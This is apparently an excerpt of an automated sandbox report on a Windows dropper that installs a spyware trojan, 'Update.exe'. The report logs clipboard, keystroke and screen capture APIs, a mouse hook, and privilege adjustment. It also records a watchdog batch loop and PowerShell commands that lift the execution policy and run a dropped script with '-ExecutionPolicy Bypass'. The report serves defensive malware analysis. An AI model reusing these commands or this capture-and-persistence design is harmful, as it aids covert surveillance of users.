    Source: powershell.exe, 00000012.00000002.2609988130.00000000052D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000012.00000002.2609988130.00000000052D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000012.00000002.2609988130.00000000052D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000012.00000002.2595617657.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000012.00000002.2621548933.0000000007D75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
    Source: powershell.exe, 00000011.00000002.2606826646.0000000005614000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2609988130.00000000052D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: [esc]3_2_0432E850
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: [esc]3_2_0432E850
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: [esc]3_2_0432E850
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: [esc]3_2_0432E850
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0432E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_0432E850
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0432E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_0432E850
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0432BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,3_2_0432BC70
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C200D93 __EH_prolog3_GS,GetParent,GetParent,UpdateWindow,SetCursor,GetAsyncKeyState,InvalidateRect,InflateRect,RedrawWindow,InvalidateRect,InflateRect,UpdateWindow,InflateRect,SetCapture,SetCursor,IsWindow,GetCursorPos,ScreenToClient,PtInRect,RedrawWindow,GetParent,GetParent,RedrawWindow,RedrawWindow,GetParent,GetParent,GetParent,InvalidateRect,UpdateWindow,UpdateWindow,NotifyWinEvent,NotifyWinEvent,SetCapture,RedrawWindow,3_2_6C200D93
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0432E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,3_2_0432E4F0
    Source: C:\Users\Public\Bilite\Axialis\Update.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C25CE24 GetKeyState,GetKeyState,GetKeyState,3_2_6C25CE24
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1D64A2 GetKeyState,GetKeyState,GetKeyState,SendMessageW,3_2_6C1D64A2
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1ED8C7 ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_6C1ED8C7
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1B5DCB CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C1B5DCB
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0432B43F ExitWindowsEx,3_2_0432B43F
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0432B41B ExitWindowsEx,3_2_0432B41B
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0432B463 ExitWindowsEx,3_2_0432B463
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_00404FAA0_2_00404FAA
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_0041206B0_2_0041206B
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_0041022D0_2_0041022D
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_00411F910_2_00411F91
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_04326C503_2_04326C50
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_04326EE03_2_04326EE0
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_043224B03_2_043224B0
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0433DDF03_2_0433DDF0
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0433D89F3_2_0433D89F
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_043289003_2_04328900
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0433F9FF3_2_0433F9FF
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0433EA1D3_2_0433EA1D
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0433E3413_2_0433E341
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_043383813_2_04338381
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1B6C383_2_6C1B6C38
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1C5C943_2_6C1C5C94
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1B5DCB3_2_6C1B5DCB
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1C19913_2_6C1C1991
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1B56FA3_2_6C1B56FA
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1C51033_2_6C1C5103
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1B6C783_2_6C1B6C78
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1B6CF93_2_6C1B6CF9
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1D6EE33_2_6C1D6EE3
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1BCFBE3_2_6C1BCFBE
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C20495F3_2_6C20495F
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C230A1B3_2_6C230A1B
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C27CACE3_2_6C27CACE
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C3106AB3_2_6C3106AB
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1BC6CC3_2_6C1BC6CC
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1BE6EC3_2_6C1BE6EC
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1E67953_2_6C1E6795
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1E23133_2_6C1E2313
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1BBFAC3_2_6C1BBFAC
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C30BFF03_2_6C30BFF0
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1B79023_2_6C1B7902
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1CD9D23_2_6C1CD9D2
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C319A963_2_6C319A96
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C313BF43_2_6C313BF4
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C2035513_2_6C203551
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1FB6BB3_2_6C1FB6BB
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1D17013_2_6C1D1701
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1B77833_2_6C1B7783
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C32F7F23_2_6C32F7F2
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1B31923_2_6C1B3192
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1F518D3_2_6C1F518D
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C3132703_2_6C313270
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1C32423_2_6C1C3242
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1C52E63_2_6C1C52E6
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C29B31D3_2_6C29B31D
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_1001122F3_2_1001122F
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_100024B03_2_100024B0
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_1000B66A3_2_1000B66A
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_100117803_2_10011780
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10010CDE3_2_10010CDE
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10012D913_2_10012D91
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10011E5C3_2_10011E5C
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_032800323_2_03280032
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_032912063_2_03291206
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_032917573_2_03291757
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0328B6413_2_0328B641
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03292D683_2_03292D68
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03290CB53_2_03290CB5
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_032824873_2_03282487
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_041BDD003_2_041BDD00
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_041B7D403_2_041B7D40
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_041A660F3_2_041A660F
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_041A1E6F3_2_041A1E6F
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_041BD7AF3_2_041BD7AF
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_041A689F3_2_041A689F
    Source: Joe Sandbox ViewDropped File: C:\Users\Public\Bilite\Axialis\Update.exe 0C2CC4513EC9101A28A7988C72A46175EFD82F387BB3BCFB2612E808804282B5
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: String function: 6C22C521 appears 71 times
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: String function: 04334300 appears 32 times
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: String function: 6C1E6BF0 appears 76 times
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: String function: 6C1E8B2F appears 44 times
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: String function: 6C1E89DB appears 333 times
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: String function: 6C1E8A44 appears 123 times
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: String function: 6C1B1900 appears 64 times
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: String function: 6C1C80BA appears 43 times
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: String function: 6C1C9700 appears 63 times
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: String function: 6C1C9B7C appears 243 times
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: String function: 6C2A688F appears 42 times
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: String function: 0040243B appears 37 times
    Source: 6f0slJzOrF.exeStatic PE information: invalid certificate
    Source: 6f0slJzOrF.exe, 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs 6f0slJzOrF.exe
    Source: 6f0slJzOrF.exe, 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7zSfxNew.exe< vs 6f0slJzOrF.exe
    Source: 6f0slJzOrF.exe, 00000000.00000003.1774772328.0000000002C4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamensdksetupJ vs 6f0slJzOrF.exe
    Source: 6f0slJzOrF.exe, 00000000.00000003.1774772328.0000000002C4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe vs 6f0slJzOrF.exe
    Source: 6f0slJzOrF.exe, 00000000.00000003.1680411362.000000000255D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs 6f0slJzOrF.exe
    Source: 6f0slJzOrF.exe, 00000000.00000003.1680411362.000000000255D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename7zSfxNew.exe< vs 6f0slJzOrF.exe
    Source: 6f0slJzOrF.exeBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs 6f0slJzOrF.exe
    Source: 6f0slJzOrF.exeBinary or memory string: OriginalFilename7zSfxNew.exe< vs 6f0slJzOrF.exe
    Source: 6f0slJzOrF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@43/29@0/1
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00407776
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_04327620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,3_2_04327620
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_04327740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_04327740
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_04327B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,3_2_04327B70
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_0040118A GetDiskFreeSpaceExW,SendMessageW,0_2_0040118A
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_04326050 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,3_2_04326050
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004034C1
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401BDF
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeFile created: C:\Users\Public\BiliteJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Users\Public\Bilite\Axialis\Update.exeMutant created: \Sessions\1\BaseNamedObjects\2024.11.10
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile created: C:\Users\user\AppData\Local\Temp\monitor.batJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
    Source: 6f0slJzOrF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 6f0slJzOrF.exeReversingLabs: Detection: 39%
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeFile read: C:\Users\user\Desktop\6f0slJzOrF.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\6f0slJzOrF.exe "C:\Users\user\Desktop\6f0slJzOrF.exe"
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\Update.exe C:\Users\Public\Bilite\Axialis\Update.exe
    Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
    Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
    Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exeJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\Update.exe C:\Users\Public\Bilite\Axialis\Update.exeJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: bcp47langs.dllJump to behavior
